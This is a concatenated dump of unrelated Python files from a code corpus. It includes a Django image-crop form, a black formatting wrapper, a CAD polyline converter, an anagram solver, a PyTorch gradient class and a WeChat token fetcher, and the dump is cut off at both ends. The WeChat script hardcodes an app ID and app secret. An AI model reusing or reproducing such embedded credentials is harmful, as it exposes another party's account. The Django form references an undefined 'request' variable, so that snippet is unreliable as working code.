forms.FloatField(widget=forms.HiddenInput())\n\n class Meta:\n model = Photo\n fields = ('file', 'x', 'y', 'width', 'height', )\n\n\n \"\"\" X coordinate, Y coordinate, height and width of the cropping box \"\"\"\n\n def save(self):\n username = self.cleaned_data.get('username') # username to save image for particular 
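user.\n\n # the hidden x/y/width/height fields carry the crop box chosen client-side\n # (e.g. by a JavaScript cropper widget) and are applied to the image below\n 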
photo = super(PhotoForm, self).save()\n\n x = self.cleaned_data.get('x') # X coordinate\n y = self.cleaned_data.get('y') # Y coordinate\n w = self.cleaned_data.get('width') # width of cropping box\n h = self.cleaned_data.get('height') # height of cropping box\n\n\n image = Image.open(photo.file).convert('RGB') # opens image file using Pillow library\n\n cropped_image = image.crop((x, y, w+x, h+y)) # crops image with x,y,w,h\n resized_image = cropped_image.resize((200, 200), Image.ANTIALIAS) # resize cropped image.\n resized_image.save(photo.file.path)\n path = photo.file.path # gets the image path.\n s3_services.upload_image(request, path, username) # calls method to upload pic to S3.\n\n\n return photo\n\n def clean_photo(self):\n\n try:\n image_file = super(PhotoForm, self)\n if not image_file.name.endswith((\".png\", \".jpeg\", \".jpg\")):\n\n messages.error(request, 'Please select valid file')\n return redirect('photo_list')\n return image_file\n\n except Exception as e:\n print(e)\n","sub_path":"restapi_demo/apidemo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"332328871","text":"import itertools\nimport sys\nimport tempfile\nimport tokenize\n\nimport black\n\n\n__version__ = \"1.2.0\"\n\n\ndef macchiato(in_fp, out_fp, args=None):\n if args is None:\n args = []\n\n # Read input.\n lines = in_fp.readlines()\n\n # Detect blank lines and deal with completely blank input.\n n_blank_before, n_blank_after = count_surrounding_blank_lines(lines)\n until = len(lines) - n_blank_after\n lines = lines[n_blank_before:until]\n if not lines:\n out_fp.write(\"\\n\" * n_blank_before)\n return 0\n\n # Detect indentation. Add \"if True:\" lines if needed for valid syntax.\n first_line = lines[0]\n indent = len(first_line) - len(first_line.lstrip())\n n_fake_before, remainder = divmod(indent, 4)\n if remainder:\n raise ValueError(\"indent of first line must be a multiple of four\")\n for i in range(n_fake_before):\n prefix = 4 * i * \" \"\n lines.insert(i, f\"{prefix}if True:\\n\")\n\n # Handle else/elif/except/finally\n try:\n first_token = next(\n tokenize.generate_tokens(iter([first_line.lstrip()]).__next__)\n )\n except tokenize.TokenError:\n first_token = None\n if first_token and first_token.type == tokenize.NAME:\n name = first_token.string\n if name in {\"else\", \"elif\"}:\n lines.insert(n_fake_before, f\"{indent * ' '}if True:\\n\")\n lines.insert(n_fake_before + 1, f\"{indent * ' '} pass\\n\")\n n_fake_before += 2\n elif name in {\"except\", \"finally\"}:\n lines.insert(n_fake_before, f\"{indent * ' '}try:\\n\")\n lines.insert(n_fake_before + 1, f\"{indent * ' '} pass\\n\")\n n_fake_before += 2\n\n 
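# e.g. a fragment starting with \"elif x:\" is padded to\n #     if True:\n #         pass\n #     elif x:\n # so that black can parse it as valid syntax.\n # Detect an unclosed block at the end. 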
Add 'pass' at the end of the line if\n # needed for valid syntax.\n last_line = lines[-1]\n n_fake_after = 0\n if last_line.rstrip().endswith(\":\"):\n lines[-1] = last_line.rstrip() + \"pass\\n\"\n n_fake_after = 1\n\n with tempfile.NamedTemporaryFile(suffix=\".py\", mode=\"wt+\", delete=False) as fp:\n\n # Copy the input.\n for line in lines:\n fp.write(line)\n\n fp.flush()\n\n # Run black.\n if \"--quiet\" not in args:\n args.append(\"--quiet\")\n args.append(fp.name)\n try:\n exit_code = black.main(args=args)\n except SystemExit as exc:\n exit_code = exc.code\n\n if exit_code == 0:\n # Write output.\n fp.seek(0)\n formatted_lines = fp.readlines()\n until = len(formatted_lines) - n_fake_after\n formatted_lines = formatted_lines[n_fake_before:until]\n fmt_n_blank_before, _ = count_surrounding_blank_lines(formatted_lines)\n formatted_lines = formatted_lines[fmt_n_blank_before:]\n out_fp.write(\"\\n\" * n_blank_before)\n for line in formatted_lines:\n out_fp.write(line)\n out_fp.write(\"\\n\" * n_blank_after)\n\n return exit_code\n\n\ndef is_blank_string(s):\n return s.isspace() or not s\n\n\ndef count_surrounding_blank_lines(lines):\n before = 0\n after = 0\n grouper = itertools.groupby(lines, is_blank_string)\n try:\n is_blank, group = next(grouper)\n except StopIteration:\n pass\n else:\n if is_blank:\n before = len(list(group))\n\n for is_blank, group in grouper:\n after = len(list(group)) if is_blank else 0\n\n return before, after\n\n\ndef main():\n try:\n args = sys.argv[1:]\n exit_code = macchiato(sys.stdin, sys.stdout, args)\n except ValueError as exc:\n raise SystemExit(str(exc))\n else:\n raise SystemExit(exit_code)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"macchiato.py","file_name":"macchiato.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"152165005","text":"import pandas as pd\r\nfrom math import trunc\r\nimport csv\r\n\r\n\r\ndef extract(exel): # build the list of line segments from the Excel sheet\r\n list_polyline = exel[exel['Name'] == 'Line']\r\n list_a_x = list_polyline['Start X'].tolist()\r\n list_a_y = list_polyline['Start Y'].tolist()\r\n for x in range(0, len(list_a_x)):\r\n list_a_x[x] = trunc(list_a_x[x])\r\n for x in range(0, len(list_a_y)):\r\n list_a_y[x] = trunc(list_a_y[x])\r\n list_b_x = list_polyline['Delta X'].tolist()\r\n list_b_y = list_polyline['Delta Y'].tolist()\r\n for x in range(0, len(list_b_x)):\r\n list_b_x[x] = list_a_x[x] + list_b_x[x]\r\n for x in range(0, len(list_a_y)):\r\n list_b_y[x] = list_a_y[x] + list_b_y[x]\r\n list_line = []\r\n for x in range(0, len(list_a_x)):\r\n list_line.append(((list_a_x[x], list_a_y[x], 0), (list_b_x[x], list_b_y[x], 0)))\r\n return list_line\r\n\r\n\r\ndef extract_point(list_line): # build the list of points from the line segments\r\n list_point = []\r\n for x in range(0, len(list_line)):\r\n list_point.append(list_line[x][0])\r\n list_point.append(list_line[x][1])\r\n return list_point\r\n\r\n\r\ndef min_xy(list_point): # find the minimum coordinates\r\n min_x = list_point[0][0]\r\n min_y = list_point[0][1]\r\n for x in range(1, len(list_point)):\r\n if list_point[x][0] < min_x:\r\n min_x = list_point[x][0]\r\n if list_point[x][1] < min_y:\r\n min_y = list_point[x][1]\r\n return min_x, min_y\r\n\r\n\r\ndef min_xy_symmetry_x_axis(list_point): # find the minimum coordinates for the x-axis-mirrored view\r\n min_x = list_point[0][0]\r\n min_y = list_point[0][1]\r\n for x in range(1, len(list_point)):\r\n if list_point[x][0] > min_x:\r\n min_x = list_point[x][0]\r\n if list_point[x][1] < min_y:\r\n min_y = 
list_point[x][1]\r\n return min_x, min_y\r\n\r\n\r\ndef max_xyz(front, rear, right, left, roof, floor):\r\n max_x = front[0][0]\r\n max_y = front[0][1]\r\n max_z = front[0][2]\r\n for x in range(1, len(front)):\r\n if front[x][0] > max_x:\r\n max_x = front[x][0]\r\n print(\"front[{}][0]={}\".format(x, front[x][0]))\r\n print(max_x)\r\n if front[x][2] > max_z:\r\n max_z = front[x][2]\r\n print(\"front[{}][2]={}\".format(x, front[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(rear)):\r\n if rear[x][0] > max_x:\r\n max_x = rear[x][0]\r\n print(\"rear[{}][0]={}\".format(x, rear[x][0]))\r\n print(max_x)\r\n if rear[x][2] > max_z:\r\n max_z = rear[x][2]\r\n print(\"rear[{}][2]={}\".format(x, rear[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(right)):\r\n if right[x][1] > max_y:\r\n max_y = right[x][1]\r\n print(\"right[{}][1]={}\".format(x, right[x][1]))\r\n print(max_y)\r\n if right[x][2] > max_z:\r\n max_z = right[x][2]\r\n print(\"right[{}][2]={}\".format(x, right[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(left)):\r\n if left[x][1] > max_y:\r\n max_y = left[x][1]\r\n print(\"left[{}][1]={}\".format(x, left[x][1]))\r\n print(max_y)\r\n if left[x][2] > max_z:\r\n max_z = left[x][2]\r\n print(\"left[{}][2]={}\".format(x, left[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(roof)):\r\n if roof[x][0] > max_x:\r\n max_x = roof[x][0]\r\n print(\"roof[{}][0]={}\".format(x, roof[x][0]))\r\n print(max_x)\r\n if roof[x][1] > max_y:\r\n max_y = roof[x][1]\r\n print(\"roof[{}][1]={}\".format(x, roof[x][1]))\r\n print(max_y)\r\n\r\n for x in range(0, len(floor)):\r\n if floor[x][0] > max_x:\r\n max_x = floor[x][0]\r\n print(\"floor[{}][0]={}\".format(x, floor[x][0]))\r\n print(max_x)\r\n if floor[x][1] > max_y:\r\n max_y = floor[x][1]\r\n print(\"floor[{}][1]={}\".format(x, floor[x][1]))\r\n print(max_y)\r\n\r\n print(\"max_x = {}, max_y={}, max_z={}\".format(max_x, max_y, max_z))\r\n return max_x, max_y, max_z\r\n\r\n\r\ndef normalize(list_line, min_x, min_y): # normalize to the minimum coordinates\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((int(list_line[x][0][0]) - int(min_x), int(list_line[x][0][1]) - int(min_y), 0),\r\n (int(list_line[x][1][0]) - int(min_x), int(list_line[x][1][1]) - int(min_y), 0))\r\n return list_line\r\n\r\n\r\ndef normalize_symmetry_x_axis(list_line, min_x, min_y): # normalize the x-axis-mirrored view\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((int(min_x) - int(list_line[x][0][0]), int(list_line[x][0][1]) - int(min_y), 0),\r\n (int(min_x) - int(list_line[x][1][0]), int(list_line[x][1][1]) - int(min_y), 0))\r\n return list_line\r\n\r\n\r\ndef xyz_front_view(list_line): # place the front view\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((list_line[x][0][0], 0, list_line[x][0][1]), (list_line[x][1][0], 0, list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_rear_view(list_line): # place the rear view\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], 0, list_line[x][0][1]), (list_line[x][1][0], 0, list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_right_side_view(list_line): # place the right side view\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (0, list_line[x][0][0], list_line[x][0][1]), (0, list_line[x][1][0], list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_left_side_view(list_line): # place the left side view\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((0, list_line[x][0][0], list_line[x][0][1]), (0, list_line[x][1][0], list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\n
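# placement convention: front/rear views lie in the xz plane, right/left in\r\n# the yz plane, roof/floor in the xy plane; the rear, right and roof copies\r\n# are shifted to y=max_y, x=max_x and z=max_z further below.\r\n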
배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], list_line[x][0][1], 0), (list_line[x][1][0], list_line[x][1][1], 0))\r\n return list_line\r\n\r\n\r\ndef xyz_right_side_view_shift(list_line, max_x):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (max_x, list_line[x][0][1], list_line[x][0][2]), (max_x, list_line[x][1][1], list_line[x][1][2]))\r\n return list_line\r\n\r\n\r\ndef xyz_rear_view_shift(list_line, max_y):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], max_y, list_line[x][0][2]), (list_line[x][1][0], max_y, list_line[x][1][2]))\r\n return list_line\r\n\r\n\r\ndef xyz_roof_floor_view_shift(list_line, max_z):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], list_line[x][0][1], max_z), (list_line[x][1][0], list_line[x][1][1], max_z))\r\n return list_line\r\n\r\n\r\nfront_view_view_xls = pd.read_excel(\"front_view.xls\") # 각 도면의 엑셀 파일 읽어오기\r\nrear_view_view_xls = pd.read_excel(\"rear_view.xls\")\r\nright_side_view_xls = pd.read_excel(\"right_side_view.xls\")\r\nleft_side_view_xls = pd.read_excel(\"left_side_view.xls\")\r\nfloor_view_xls = pd.read_excel(\"floor_view.xls\")\r\nroof_floor_view_xls = pd.read_excel(\"roof_floor_view.xls\")\r\n\r\nfront_view_line = extract(front_view_view_xls) # 각 도면의 엑셀 파일로부터 선분 리스트 생성\r\nrear_view_line = extract(rear_view_view_xls)\r\nright_side_view_line = extract(right_side_view_xls)\r\nleft_side_view_line = extract(left_side_view_xls)\r\nfloor_view_line = extract(floor_view_xls)\r\nroof_floor_view_line = extract(roof_floor_view_xls)\r\n\r\nfront_view_points = extract_point(front_view_line) # 각 도면의 선분 리스트로부터 모든 점의 리스트 생성\r\nrear_view_points = extract_point(rear_view_line)\r\nright_side_points = extract_point(right_side_view_line)\r\nleft_side_points = extract_point(left_side_view_line)\r\nfloor_points = extract_point(floor_view_line)\r\nroof_floor_points = extract_point(roof_floor_view_line)\r\n\r\nprint(\"size={}\\n front point = {}\".format(len(front_view_points), front_view_points))\r\nprint(\"rear point = {}\".format(rear_view_points))\r\nprint(\"right point = {}\".format(right_side_points))\r\nprint(\"left point = {}\".format(left_side_points))\r\nprint(\"roof point = {}\".format(roof_floor_points))\r\nprint(\"floor point = {}\".format(floor_points))\r\n\r\nfront_view_min_x, front_view_min_y = min_xy(front_view_points) # x좌표와 y좌표 최소값 탐색\r\nrear_view_min_x, rear_view_min_y = min_xy_symmetry_x_axis(rear_view_points)\r\nright_side_min_x, right_side_min_y = min_xy(right_side_points)\r\nleft_side_min_x, left_side_min_y = min_xy_symmetry_x_axis(left_side_points)\r\nfloor_min_x, floor_min_y = min_xy(floor_points)\r\nroof_floor_min_x, roof_floor_min_y = min_xy(roof_floor_points)\r\n\r\nfront_view_line = normalize(front_view_line, front_view_min_x, front_view_min_y) # 최소 x, y값을 기준으로 좌표 변환\r\nrear_view_line = normalize_symmetry_x_axis(rear_view_line, rear_view_min_x, rear_view_min_y)\r\nright_side_view_line = normalize(right_side_view_line, right_side_min_x, right_side_min_y)\r\nleft_side_view_line = normalize_symmetry_x_axis(left_side_view_line, left_side_min_x, left_side_min_y)\r\nfloor_view_line = normalize(floor_view_line, floor_min_x, floor_min_y)\r\nroof_floor_view_line = normalize(roof_floor_view_line, roof_floor_min_x, roof_floor_min_y)\r\n\r\nprint(\"size={}\\n front point = {}\".format(len(front_view_points), front_view_points))\r\nprint(\"rear point = {}\".format(rear_view_points))\r\nprint(\"right point = 
{}\".format(right_side_points))\r\nprint(\"left point = {}\".format(left_side_points))\r\nprint(\"roof point = {}\".format(roof_floor_points))\r\nprint(\"floor point = {}\".format(floor_points))\r\n\r\nfront_view_line = xyz_front_view(front_view_line) # 3차원 공간좌표로 변환\r\nrear_view_line = xyz_rear_view(rear_view_line)\r\nright_side_view_line = xyz_right_side_view(right_side_view_line)\r\nleft_side_view_line = xyz_left_side_view(left_side_view_line)\r\nroof_floor_view_line = xyz_roof_floor_view(roof_floor_view_line)\r\n\r\nfront_view_points = extract_point(front_view_line) # 변환된 각 도면의 선분 리스트로부터 모든 점의 리스트 재생성\r\nrear_view_points = extract_point(rear_view_line)\r\nright_side_points = extract_point(right_side_view_line)\r\nleft_side_points = extract_point(left_side_view_line)\r\nfloor_points = extract_point(floor_view_line)\r\nroof_floor_points = extract_point(roof_floor_view_line)\r\n\r\nmax_x, max_y, max_z = max_xyz( # 변환한 공간 좌표 중 x, y, z 최대값 ��색\r\n front_view_points,\r\n rear_view_points,\r\n right_side_points,\r\n left_side_points,\r\n roof_floor_points,\r\n floor_points)\r\n\r\nrear_view_line = xyz_rear_view_shift(rear_view_line, max_y) # 탐색한 최대값을 이용하여 배면도, 우측면도, 지붕도면 평행 이동\r\nright_side_view_line = xyz_right_side_view_shift(right_side_view_line, max_x)\r\nroof_floor_view_line = xyz_roof_floor_view_shift(roof_floor_view_line, max_z)\r\n\r\nprint(\"front\")\r\nfor x in front_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"rear\")\r\nfor x in rear_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"right side\")\r\nfor x in right_side_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"left side\")\r\nfor x in left_side_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"roof floor\")\r\nfor x in roof_floor_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"floor\")\r\nfor x in floor_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\n\r\nfront = open(\"front_view.csv\", \"w\", newline=\"\")\r\nwr_front = csv.writer(front)\r\nfor x in range(0, len(front_view_line)):\r\n wr_front.writerow(\r\n [front_view_line[x][0][0], front_view_line[x][0][1], front_view_line[x][0][2],\r\n front_view_line[x][1][0] ,\r\n front_view_line[x][1][1] , front_view_line[x][1][2] ])\r\nfront.close()\r\n\r\nrear = open(\"rear_view.csv\", \"w\", newline=\"\")\r\nwr_rear = csv.writer(rear)\r\nfor x in range(0, len(rear_view_line)):\r\n wr_rear.writerow(\r\n [rear_view_line[x][0][0] , rear_view_line[x][0][1] , rear_view_line[x][0][2] ,\r\n rear_view_line[x][1][0] ,\r\n rear_view_line[x][1][1] , rear_view_line[x][1][2]])\r\nrear.close()\r\n\r\nright = open(\"right_view.csv\", \"w\", newline=\"\")\r\nwr_right = csv.writer(right)\r\nfor x in range(0, len(right_side_view_line)):\r\n wr_right.writerow([right_side_view_line[x][0][0], right_side_view_line[x][0][1],\r\n right_side_view_line[x][0][2] ,\r\n right_side_view_line[x][1][0] ,\r\n right_side_view_line[x][1][1] , right_side_view_line[x][1][2] ])\r\nright.close()\r\n\r\nleft = open(\"left_view.csv\", \"w\", newline=\"\")\r\nwr_left = csv.writer(left)\r\nfor x in range(0, len(left_side_view_line)):\r\n wr_left.writerow(\r\n [left_side_view_line[x][0][0] , left_side_view_line[x][0][1] , left_side_view_line[x][0][2],\r\n left_side_view_line[x][1][0] ,\r\n left_side_view_line[x][1][1] , left_side_view_line[x][1][2] ])\r\nleft.close()\r\n\r\nroof = open(\"roof_view.csv\", \"w\", newline=\"\")\r\nwr_roof = csv.writer(roof)\r\nfor x in range(0, len(roof_floor_view_line)):\r\n 
wr_roof.writerow([roof_floor_view_line[x][0][0], roof_floor_view_line[x][0][1],\r\n                      roof_floor_view_line[x][0][2],\r\n                      roof_floor_view_line[x][1][0],\r\n                      roof_floor_view_line[x][1][1], roof_floor_view_line[x][1][2]])\r\nroof.close()\r\n\r\nfloor = open(\"floor_view.csv\", \"w\", newline=\"\")\r\nwr_floor = csv.writer(floor)\r\nfor x in range(0, len(floor_view_line)):\r\n    wr_floor.writerow(\r\n        [floor_view_line[x][0][0], floor_view_line[x][0][1], floor_view_line[x][0][2],\r\n         floor_view_line[x][1][0],\r\n         floor_view_line[x][1][1], floor_view_line[x][1][2]])\r\nfloor.close()\r\n","sub_path":"PolyLine_Link/PolyLine_Link/PolyLine_Extraction.py","file_name":"PolyLine_Extraction.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495954186","text":"# Time Complexity : O(n), with a constant 26-element comparison per window\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n'''\n1. Sliding window using slow and fast pointers.\n\n2. Maintain 2 counter arrays of length 26, one for the string and one for the pattern.\n3. Each counter stores the frequency of a letter, indexed by its ASCII value.\n4. Move across the string, updating the string counter, until the window length == len(pattern).\n5. Check whether the string counter array == the pattern counter array; if yes, append the left index of the window to the result.\n6. Move left by 1 and right by 1, first undoing the left character's change by decrementing the count at its respective ASCII index.\n'''\n\nfrom typing import List\n\n\nclass Solution:\n    \n    def compare_arrays(self, arr1, arr2):\n        \n        for i in range(26):\n            if arr1[i] != arr2[i]:\n                return False\n        \n        return True\n    \n    \n    def findAnagrams(self, s: str, p: str) -> List[int]:\n        \n        if s == \"\":\n            return []\n        \n        string_count = [0]*26\n        pattern_count = [0]*26\n        \n        for ch in p:\n            pattern_count[ord(ch)-ord('a')] += 1\n        \n        \n        result = []\n        left, right = 0, 0\n        \n        while right < len(s):\n            \n            string_count[ord(s[right]) - ord('a')] += 1\n            \n            if right-left+1 == len(p):\n                #compare array \n                if self.compare_arrays(string_count, pattern_count):\n                    result.append(left)\n                \n                string_count[ord(s[left]) - ord('a')] -= 1\n                left += 1\n            \n            right += 1\n        return result\n    ","sub_path":"find_all_anagram.py","file_name":"find_all_anagram.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422517820","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# cw_funkcje1.py\r\n# \r\n# Copyright 2020 nie wiem \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\n\r\ndef awans(lata, zarobek, staz):\r\n\r\n    for i in range(lata-1):\r\n        staz += 1\r\n        zarobek = zarobek + 0.1*zarobek\r\n    return zarobek, staz\r\n\r\ndef drukuj(staz, zarobek):\r\n    print(\"Po \", staz, \" latach stażu bedziesz zarabiał: \", zarobek)\r\n\r\ndef main(args):\r\n    staz = 1\r\n    zarobek = 1000\r\n\r\n    lata = int(input(\"Podaj przewidywaną ilość lat pracy: \"))\r\n    \r\n    zarobek, staz = awans(lata, zarobek, staz)\r\n    \r\n    drukuj(staz, zarobek)\r\n\r\n    return 0\r\n\r\nif __name__ == '__main__':\r\n    import sys\r\n    sys.exit(main(sys.argv))\r\n","sub_path":"cpp/cw_funkcje1.py","file_name":"cw_funkcje1.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634302649","text":"# lptanh_const_grad.py\n\"\"\"\nCreated on Thu Jun 7 17:04:23 2018\n\n@author: Wentao Huang\n\"\"\"\nimport ipdb\nimport torch as tc\nfrom .grad import Grad\nfrom . import constraint\n\nclass LPTanhConstGrad(Grad):\n\n    @staticmethod\n    def forward(ctx, input, C, bias=None, beta=0.9, \n                isorth=True, eps=1e-6, const_fun='const_lptanh', \n                beta0=0.1, const_factor=0.1, \n                balance_factor=0.5, alpha=0.8, center=None):\n        F = getattr(constraint, const_fun, None)\n        if isinstance(bias, tc.Tensor):\n            bias_requires_grad = bias.requires_grad\n        else:\n            bias_requires_grad = False\n        if bias is not None:\n            bias = beta * bias\n        C1 = beta * C\n        Fc = []\n        dFc = []\n        if center is not None:\n            assert isinstance(center, list)\n#            ipdb.set_trace()\n            for f in center:\n                f = f.mm(C1)\n                if bias is not None:\n                    f.add_(bias)\n                Fc.append(f.tanh().mul_(alpha).add_((1.0-alpha)/beta*f))\n                f = f.tanh().pow_(2).add_(-1.0).mul_(-alpha*beta).add_(1.0-alpha)\n                dFc.append(f)\n        R = input.get_len_list()\n        M = len(R)\n        if balance_factor == 0.5:\n            R = [0.5/(M*i) for i in R]\n        else:\n            R = [1.0/len(input)]*M\n        r0 = const_factor/M\n        input.reiter()\n        obj0 = 0.0\n        db = 0.0 if bias_requires_grad else None #tc.Tensor([0.0])\n        dQ = 0.0\n        for X, name in input:\n            ith_cls = input.get_index(name)\n            r = R[ith_cls] #0.0#\n#            ipdb.set_trace()\n            f = X.mm(C1)\n            if bias is not None:\n                f.add_(bias)\n            f0 = f.mul((1.0-alpha)/beta)\n            f.tanh_()\n            f0 = f.mul(alpha).add_(f0)\n            g0 = f.pow(2).add_(-1.0).mul_(-alpha*beta)\n            g = g0.add_(1.0-alpha+eps)\n            f.mul_(g0).mul_(-2.0).div_(g)\n            if r0 > 0.0:\n                objz, dQz, dbz = F(X, f0, g, center, Fc, dFc, ith_cls, \n                                   bias_requires_grad, balance_factor, beta0, eps)\n            else:\n                objz = dQz = dbz = 0.0\n            f0 = g0 = None\n            obj0 += g.log_().sum().mul_(-r) + r0*objz\n            dQ += -r*(X.t().mm(f)) + r0*dQz\n            if bias_requires_grad:\n                db += -r*f.sum(0) + r0*dbz\n            f = g = None\n        K = C.size(1)\n        if K == 1:\n            G = C.t().mm(C) + eps\n            obj1 = -0.5*G.log()\n        else:\n            G = C.t().mm(C) + tc.diag(tc.full((C.size(1),), eps))\n            sign, logdet = tc.slogdet(G)\n            obj1 = -0.5*logdet\n        dQ = dQ.mm(C.t().mm(C))\n        if isorth:\n            dC = dQ - C.mm(dQ.t()).mm(C)\n        else:\n            dC = dQ - C\n        argnum = tc.tensor([13])\n        ctx.save_for_backward(dC, db, argnum)\n        return obj0 + 
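obj1  # per-class objective plus the -0.5 * logdet(C^T C + eps * I) volume term\n\n# Assumption (reader annotation): the parent Grad class implements backward()\n# from the (dC, db, argnum) tensors saved via ctx.save_for_backward above, so\n# forward() only needs to return the scalar objective obj0 + 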
obj1\n\n\n\n","sub_path":"code/learn/lptanh_const_grad.py","file_name":"lptanh_const_grad.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"605531100","text":"import requests\nimport threading\nimport time\nfrom threading import Timer\nimport sys\nimport logging\n\ng_access_token=''\ng_update_time=time.localtime()\ng_expires_in=7200\ng_dx_expires_in=600\n\ng_appid='wxddb81ec87b64db28'\n#g_appsecret='bd2eb4735026bff4e8bbc974b26d3da7'\ng_appsecret='114cd107e4a078a85c0d74ca032db10b'\ng_url='https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}'\ng_headers={'Accept': 'application/json', 'Content-Type': 'application/json'}\n\ng_lock=threading.Lock()\n\ndef get_access_token():\n    logging.info('fun={},ident={}'.format(sys._getframe().f_code.co_name,threading.currentThread().ident))\n    g_lock.acquire()\n    temp=g_access_token\n    # need_update=(len(temp) <= 0)\n    # if need_update is False:\n    #     validity_time=time.localtime(time.time()-g_expires_in+g_dx_expires_in)\n    #     if g_update_time < validity_time:\n    #         need_update = True\n    g_lock.release()\n\n    if len(temp) <= 0:\n        update_access_token(True)\n        g_lock.acquire()\n        temp=g_access_token\n        g_lock.release()\n    else:\n        validity_time=time.localtime(time.time()-g_expires_in+g_dx_expires_in)\n        if g_update_time < validity_time:\n            update_access_token(False)\n\n    return temp\n\ndef update_access_token(sync=False):\n    logging.info('fun={},ident={}'.format(sys._getframe().f_code.co_name,threading.currentThread().ident))\n    logging.info('sync={}'.format(sync))\n    if sync is True:\n        request_access_token()\n    else:\n        sTimer = Timer(1, request_access_token)\n        sTimer.start()\n\ndef request_access_token():\n    logging.info(threading.currentThread())\n    global g_access_token\n    global g_expires_in\n    global g_update_time\n\n    r=requests.get(g_url.format(g_appid,g_appsecret),headers=g_headers)\n    logging.info(\"request.status_code={},encoding={}\".format(r.status_code,r.encoding))\n    json_data=r.json()\n    token=json_data['access_token']\n    expires_in=json_data['expires_in']\n    if type(token) is str and type(expires_in) is int:\n        logging.info(\"update token is success\")\n        g_lock.acquire()\n        g_access_token=token\n        g_expires_in=expires_in\n        g_expires_in=605\n        g_update_time=time.localtime()\n        g_lock.release()\n    else:\n        logging.error(\"update token is error\")\n\n    logging.info('expires_in={},g_access_token={}'.format(expires_in,g_access_token))\n\n\nif __name__ == \"__main__\":\n#    zwutil.init_log(True)\n    update_access_token()\n    \n    # sTimer = Timer(1, get_access_token)\n    # sTimer.start()\n    # time.sleep(100)\n\n\n\n","sub_path":"webwx/wx/wxtoken.py","file_name":"wxtoken.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85364001","text":"import random\n\nbalicek = []\nfor hodnota in range(1, 14):\n    for barva in 'Pi', 'Sr', 'Ka', 'Kr':\n        balicek.append((hodnota, barva, False))\nrandom.shuffle(balicek)\n\nsloupecky = []\nfor cislo_sloupecku in range(1, 8):\n    sloupecek = []\n    for radek in range(cislo_sloupecku + 1):\n        # assumption: each row deals one card from the top of the shuffled deck\n        sloupecek.append(balicek.pop())\n    sloupecky.append(sloupecek)","sub_path":"udelej_hru.py","file_name":"udelej_hru.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192764712","text":"import numpy as np\n\nclass Problem:\n\tdef __init__(self, problem, heuristics, goal):\n\t\tself.problem = problem\n\t\tself.heuristics = 
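heuristics\n\t\t# Manhattan-distance table from Puzzle.generate_heuristics; a hypothetical\n\t\t# peek: heuristics[(0, 0)][(2, 1)] == 3, i.e. |0 - 2| + |0 - 1|.\n\t\t# est_cost() later sums these distances over misplaced tiles via self.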
